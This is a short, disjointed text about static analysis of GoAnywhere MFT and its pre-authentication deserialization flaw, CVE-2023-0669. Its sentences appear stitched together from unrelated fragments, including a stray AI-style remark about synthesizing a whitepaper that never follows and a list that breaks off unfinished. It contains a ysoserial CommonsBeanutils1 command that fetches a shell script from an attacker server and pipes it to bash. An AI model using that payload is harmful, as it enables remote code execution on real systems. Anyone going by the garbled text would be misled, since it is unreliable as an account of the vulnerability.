GoAnywhere Static Analysis

Based on the static analysis, an exploit chain was constructed using the library.

Because there is no academic paper titled "GoAnywhere Static Analysis," I have synthesized the available technical research, security advisories, and reverse engineering reports into a comprehensive technical whitepaper format below. This details how static analysis of the Java bytecode led to the discovery of the deserialization vulnerability.

The attacker generates a malicious serialized object that utilizes the Commons BeanUtils gadget chain to execute a system command (e.g., touch /tmp/pwned or a reverse shell).

Checking how servers, databases, and cloud storage connections are defined.

Static analysis, in the context of software security, refers to the process of analyzing software without executing it, to identify potential vulnerabilities, weaknesses, or malicious code.

java -jar ysoserial.jar CommonsBeanutils1 "curl http://attacker-server/shell.sh | bash"

Always use the "Restrict" features in GoAnywhere to ensure that only expected file types and sizes are processed.

For organizations practicing , GoAnywhere configurations should be treated as code. By storing Project XMLs in a Git repository, you can trigger automated static analysis scans every time a workflow is updated. Tools like SonarQube or specialized XML linters can be configured to catch errors early.

Best Practices for Secure GoAnywhere Workflows

Discovery of Pre-Authentication Remote Code Execution (CVE-2023-0669)

Target: GoAnywhere MFT (Managed File Transfer)
Component: Admin Web Console
Vulnerability Class: Insecure Deserialization

Your static analysis rules must catch these: